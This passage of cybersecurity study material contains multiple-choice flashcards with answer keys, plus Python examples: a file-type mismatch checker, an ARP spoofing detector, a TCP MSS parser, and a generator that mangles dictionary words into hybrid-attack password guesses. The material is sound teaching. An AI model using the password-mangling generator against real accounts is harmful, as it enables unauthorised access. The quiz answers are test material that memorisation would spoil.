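def detect_type(data):
    """Return the canonical type whose magic bytes match, or None."""
    for name, sig in MAGIC:
        if data.startswith(sig):
            return name
    return None

def claimed_type(filename):
    """Return the canonical type implied by the extension, or None if unknown."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return EXT_TO_TYPE.get(ext)

def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()

def assess(filename, data, blocklist):
    """Return (verdict, reasons): 'block', 'suspicious' or 'allow'."""
    reasons = []
    digest = sha256_hex(data)
    actual, claimed = detect_type(data), claimed_type(filename)
    if digest in blocklist:
        reasons.append(f"sha256 {digest[:16]}... is on the block list")
    hidden_exe = actual == "pe" and claimed != "pe"
    if hidden_exe:
        reasons.append(f"named as {claimed or 'unknown type'} but content is a PE executable")
    elif actual and claimed and actual != claimed:
        reasons.append(f"named as {claimed} but content is {actual}")
    if digest in blocklist or hidden_exe:
        return "block", reasons
    return ("suspicious" if reasons else "allow"), reasons

# Constructed samples (not real malware): a PE stub named invoice.pdf, a JPEG
# header named report.pdf, and a genuine PDF header.
FAKE_INVOICE = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
MISLABELLED_REPORT = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
REAL_PDF = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj\n<< >>\nendobj\n"
# Hypothetical block list: we pretend the fake invoice's hash is the known sample.
BLOCKLIST = {sha256_hex(FAKE_INVOICE)}

if __name__ == "__main__":
    for name, data in [("invoice.pdf", FAKE_INVOICE), ("report.pdf", MISLABELLED_REPORT),
                       ("update.bin", FAKE_INVOICE), ("quarterly.pdf", REAL_PDF)]:
        verdict, why = assess(name, data, BLOCKLIST)
        print(f"{name}: {verdict} {'; '.join(why)}")
```

Note what each check does and does not cover: the magic-byte comparison defeats a simple rename (update.bin carrying the same bytes is still blocked), while the hash only matches this exact sample, so a one-byte change to the file slips past the block list and has to be caught by the type check or by behavioural detection.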
A security team notices an attacker attempting multiple login attempts using passwords such as:
Admin2024!
Secure#123
Qwerty1!
What type of attack is this?
A) Brute Force Attack
B) Dictionary Attack
C) Hybrid Attack
D) Credential Stuffing
✅ Correct Answer: C) Hybrid Attack
📌 Explanation:
The attacker is using a dictionary attack (common words like admin, secure, qwerty).
They are modifying the words using numbers and symbols (2024!, #123, 1!).
This combination of dictionary and brute-force techniques defines a Hybrid Attack.
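To see why the three attempts above are classed as a hybrid attack rather than a plain dictionary or brute-force attack, it helps to look at how a hybrid candidate list is actually built: dictionary words plus a small set of mangling rules (case changes, appended years and digits, a trailing or inserted symbol). The Python below is an added example, not part of the flashcard; the base word list and rule set are constructed and deliberately tiny, and the classify_attack() labels are a simplification for illustration.

```python
"""Hybrid-attack candidate generation and attempt classification.
Word list and mangling rules are constructed for this example."""

BASE_WORDS = ["admin", "secure", "qwerty", "password"]
YEARS = ["2023", "2024", "2025"]
DIGITS = ["1", "123"]
SYMBOLS = ["!", "#", "@"]

def capitalizations(word):
    """The case variants a typical rule set tries."""
    return [word, word.capitalize(), word.upper()]

def mangle(word):
    """Yield candidates built from one dictionary word by appending or
    inserting digits, years and symbols in the positions users favour."""
    for w in capitalizations(word):
        yield w                         # plain dictionary word
        for d in DIGITS + YEARS:
            yield w + d                 # admin123, Admin2024
            for s in SYMBOLS:
                yield w + d + s         # Admin2024!, Qwerty1!
                yield w + s + d         # Secure#123
                yield s + w + d         # !admin1

def hybrid_candidates(words):
    """All distinct candidates the rule set derives from the word list."""
    seen = set()
    for word in words:
        for cand in mangle(word):
            if cand not in seen:
                seen.add(cand)
                yield cand

def classify_attack(attempts, words):
    """Label a series of observed attempts (simplified for illustration).

    dictionary:  every attempt is an unmodified word from the list
    hybrid:      every attempt is a word from the list with mangling applied
    brute_force: anything else (exhaustive or unknown generation)
    """
    plain = {w.lower() for w in words}
    if all(a.lower() in plain for a in attempts):
        return "dictionary"
    candidates = set(hybrid_candidates(words))
    if all(a in candidates for a in attempts):
        return "hybrid"
    return "brute_force"

if __name__ == "__main__":
    observed = ["Admin2024!", "Secure#123", "Qwerty1!"]  # the flashcard's attempts
    print(len(set(hybrid_candidates(BASE_WORDS))), "candidates from 4 words")
    print(classify_attack(observed, BASE_WORDS))
```

Four base words and a handful of rules already produce several hundred candidates, which is the point of the hybrid approach: far fewer guesses than exhaustive brute force, far more coverage than the raw dictionary.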
A user reports they cannot access a company website and receives the following error:
“HTTP 400 - Bad Request”
What is the most likely cause?
A) The server is overloaded
B) The client sent a malformed request
C) The page was moved permanently
D) The user does not have permission to access the page
✅ Correct Answer: B) The client sent a malformed request
📌 Explanation:
HTTP 400 (Bad Request) happens when the client sends a request the server cannot understand.
Common causes include:
Malformed syntax (e.g., missing characters in a URL).
Incorrect request formatting in APIs.
Corrupt browser cache/cookies.
You analyze a router log and notice:
Multiple ARP reply packets for the same IP (192.168.1.10) but with different MAC addresses
Frequent changes in MAC addresses within seconds
What does this likely indicate?
A) Normal behavior due to network updates
B) A sign of an ARP spoofing attack
C) A brute force attack
D) A failing network adapter
✅ Correct Answer: B) A sign of an ARP spoofing attack
📌 Explanation:
ARP spoofing occurs when an attacker manipulates ARP tables by sending false ARP replies.
The same IP being claimed by different MAC addresses within seconds is a strong indicator of ARP spoofing (a legitimate NIC replacement or DHCP reassignment changes the mapping once, not back and forth).
Attackers use this to redirect traffic through their own host and mount man-in-the-middle (MITM) attacks.
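Both ARP cards above (the router log with two replies for 192.168.1.10 and this one) describe the same detection rule: the same IP answered by different MACs within a short window. The Python below is an added example, not code from the flashcards, that applies that rule to log lines in the same format as the router log shown earlier; the log text is constructed (the first two lines reproduce the flashcard's pair, the rest are benign filler) and the 60-second window is an assumed tuning value.

```python
"""Flag an IP address that is claimed by more than one MAC within a short window."""
from datetime import datetime, timedelta
import re

# Constructed sample log in the format of the flashcard's router log.
# The first two lines are the suspicious pair; the remaining lines are benign.
SAMPLE_LOG = """\
03/01/2025 15:23:23 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
03/01/2025 15:23:26 Gi0/1 ARP Reply 192.168.1.10 is at AA:BB:CC:DD:EE:FF
03/01/2025 15:23:30 Gi0/1 ARP Reply 192.168.1.10 is at 11:22:33:44:55:66
03/01/2025 15:23:35 Gi0/1 ARP Reply 192.168.1.20 is at 00:11:22:33:44:55
03/01/2025 15:40:00 Gi0/2 ARP Reply 192.168.1.30 is at 00:11:22:33:44:66
"""

ARP_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}) (?P<iface>\S+) ARP Reply "
    r"(?P<ip>\d+\.\d+\.\d+\.\d+) is at (?P<mac>[0-9A-Fa-f:]{17})$"
)

def parse_arp_replies(text):
    """Yield (timestamp, interface, ip, mac) for each ARP Reply line."""
    for line in text.splitlines():
        m = ARP_RE.match(line.strip())
        if not m:
            continue  # not an ARP reply line; ignore
        ts = datetime.strptime(m["ts"], "%m/%d/%Y %H:%M:%S")
        yield ts, m["iface"], m["ip"], m["mac"].lower()

def find_arp_conflicts(text, window_seconds=60):
    """Return alerts for IPs whose MAC changed within window_seconds.

    Each alert is (ip, previous_mac, new_mac, seconds_since_previous_reply).
    A change long after the previous reply is not alerted on: a host can
    legitimately get a new NIC, or DHCP can hand the IP to another host.
    """
    window = timedelta(seconds=window_seconds)   # assumed tuning value
    last_seen = {}                                # ip -> (timestamp, mac)
    alerts = []
    for ts, _iface, ip, mac in parse_arp_replies(text):
        prev = last_seen.get(ip)
        if prev is not None:
            prev_ts, prev_mac = prev
            if prev_mac != mac and ts - prev_ts <= window:
                alerts.append((ip, prev_mac, mac, (ts - prev_ts).total_seconds()))
        last_seen[ip] = (ts, mac)
    return alerts

if __name__ == "__main__":
    for ip, old, new, secs in find_arp_conflicts(SAMPLE_LOG):
        print(f"possible ARP spoofing: {ip} moved {old} -> {new} after {secs:.0f}s")
```

The flip back to the original MAC on the third line is what you typically see when the real host and the attacker both keep answering; it produces a second alert, and that flapping is the strongest single signal in the log. On a real device the next step is to compare against the switch's MAC table (or a static ARP entry) to establish which MAC is legitimate.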
You review a security log and notice:
Event ID  Description                 Severity  Action Taken
4105      SQL Injection Attempt       High      Blocked
4120      Brute Force Attack          High      Blocked
4130      Data Exfiltration Detected  High      Alerted
Which event should be investigated first?
A) 4105 - SQL Injection Attempt
B) 4120 - Brute Force Attack
C) 4130 - Data Exfiltration Detected
D) None, because all attacks were blocked
✅ Correct Answer: C) 4130 - Data Exfiltration Detected
📌 Explanation:
The SQL injection and brute-force attempts were blocked, so they caused no immediate damage (they still merit review afterwards).
Data Exfiltration was only "alerted", not blocked, meaning data may already be leaving the network.
An event that a control has not stopped, especially possible data loss, is investigated before events the controls already contained.
During a network capture analysis, you notice a SYN packet with the following details:
Transmission Control Protocol, Src Port: 54321, Dst Port: 80
Flags: SYN
Maximum Segment Size (MSS): 1460
Given that the MSS value is 1460, what is the likely MTU (Maximum Transmission Unit) size of this network?
A) 1460 bytes
B) 1500 bytes
C) 1400 bytes
D) 1480 bytes
Correct Answer: ✅ B) 1500 bytes
Explanation:
MSS is derived by subtracting the TCP header (20 bytes) and the IPv4 header (20 bytes) from the MTU, assuming no IP or TCP options.
Formula: MSS = MTU - (TCP Header + IP Header) → 1460 = MTU - 40. (Over IPv6 the IP header is 40 bytes, so a 1500-byte MTU gives an MSS of 1440.)
Solving for MTU: MTU = 1460 + 40 = 1500 bytes, the standard Ethernet MTU.
A) 1460 bytes is incorrect → MSS is not the MTU; it is the TCP payload portion only.
C) 1400 bytes is incorrect → An MTU of 1400 would give an MSS of 1360.
D) 1480 bytes is incorrect → An MTU of 1480 would give an MSS of 1440.
A security analyst is troubleshooting slow network performance and notices that packets are smaller than expected. What is a likely reason?
A) The client and server negotiated a lower MSS than expected
B) The network is dropping SYN packets
C) The client is using UDP instead of TCP
D) The firewall is blocking TCP connections
Correct Answer: ✅ A) The client and server negotiated a lower MSS than expected
Explanation:
A) MSS negotiation can lower packet sizes → Each side advertises its MSS in the SYN and the smaller value wins; a lower MSS means more segments, and so more header overhead and per-packet processing, for the same amount of data, which shows up as reduced throughput.
B) Dropped SYN packets would cause connection failures, not just slow performance.
C) UDP does not use MSS, so this is unrelated.
D) If TCP connections were blocked, there would be no communication at all.
A cybersecurity analyst detects a series of SYN packets with an MSS value of 536 during an investigation. What might this indicate?
A) Normal TCP communication
B) A possible attack attempt
C) A network misconfiguration
D) An overloaded firewall
Correct Answer: ✅ B) A possible attack attempt
Explanation:
An MSS of 536 is the RFC 879 default (the 576-byte minimum IPv4 datagram minus 40 bytes of headers), far below the 1460 a host on a standard Ethernet link would advertise. One such SYN may just be an odd or old host, but a series of them during an investigation suggests crafted packets, for example a tool forcing tiny segments so that a payload signature is split across packets and evades inspection.
A) Normal TCP communication on a 1500-byte link advertises an MSS of 1460 (1440 over IPv6), or slightly less behind tunnels or PPPoE.
C) A misconfiguration is possible but less likely than crafted traffic when the value appears repeatedly.
D) MSS does not directly relate to firewall load.
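The three MSS cards above (1460 implies a 1500-byte MTU, a negotiated-down MSS, and a suspicious 536) are easier to reason about with the option bytes in hand. The Python below is an added example, not code from the flashcards: it builds a bare TCP SYN with an MSS option, parses the option back out, converts between MSS and MTU for IPv4 and IPv6, and classifies the advertised value. The SYN is constructed by build_syn() rather than captured, and the thresholds in assess_mss() are assumptions chosen for illustration, not a standard.

```python
"""Extract the MSS option from a TCP SYN and relate it to the link MTU.
The SYN segment is constructed with build_syn(); nothing is captured live."""
import struct

TCP_HEADER = 20
IPV4_HEADER = 20
IPV6_HEADER = 40

def build_syn(src_port, dst_port, mss=None):
    """Build a bare TCP SYN header (no IP header), with an MSS option if given."""
    opts = b"" if mss is None else struct.pack("!BBH", 2, 4, mss)   # kind 2, len 4
    words = (TCP_HEADER + len(opts)) // 4
    header = struct.pack("!HHIIBBHHH", src_port, dst_port, 0, 0,
                         words << 4, 0x02, 65535, 0, 0)   # flags byte 0x02 = SYN
    return header + opts

def parse_tcp(segment):
    """Return ports, SYN flag and the advertised MSS (None if absent)."""
    src, dst, _seq, _ack, off, flags, _win, _csum, _urg = struct.unpack("!HHIIBBHHH", segment[:20])
    hlen = (off >> 4) * 4
    options, mss, i = segment[20:hlen], None, 0
    while i < len(options):
        kind = options[i]
        if kind == 0:            # end of option list
            break
        if kind == 1:            # NOP padding, single byte
            i += 1
            continue
        if i + 1 >= len(options):
            break                # truncated option
        length = options[i + 1]
        if length < 2:
            break                # a malformed length would otherwise loop forever
        if kind == 2 and length == 4:
            mss = struct.unpack("!H", options[i + 2:i + 4])[0]
        i += length
    return {"src_port": src, "dst_port": dst, "syn": bool(flags & 0x02), "mss": mss}

def mtu_from_mss(mss, ipv6=False):
    """MTU implied by an MSS, assuming no IP/TCP options (20+20, or 40+20 for IPv6)."""
    return mss + TCP_HEADER + (IPV6_HEADER if ipv6 else IPV4_HEADER)

def mss_from_mtu(mtu, ipv6=False):
    return mtu - TCP_HEADER - (IPV6_HEADER if ipv6 else IPV4_HEADER)

def assess_mss(mss, link_mtu=1500):
    """Classify an advertised MSS against the expected link MTU.
    Thresholds are assumptions for this example, not a standard."""
    if mss is None:
        return "absent"          # receiver falls back to the RFC 879 default of 536
    expected = mss_from_mtu(link_mtu)
    if mss >= expected:
        return "normal"
    if mss >= expected - 100:
        return "reduced"         # tunnel / PPPoE overhead territory
    return "low"                 # e.g. 536: correlate with other indicators

if __name__ == "__main__":
    syn = build_syn(54321, 80, 1460)
    info = parse_tcp(syn)
    print(info, "implied MTU", mtu_from_mss(info["mss"]), assess_mss(info["mss"]))
    print(parse_tcp(build_syn(40000, 443, 536)), assess_mss(536))
```

Two things the parser guards against are worth carrying into real tooling: a zero or one-byte option length, which would otherwise make the loop spin, and a truncated option list, which crafted SYNs do produce. A "low" verdict on its own is a prompt to look further (source host, frequency, what else it sends), not a conviction.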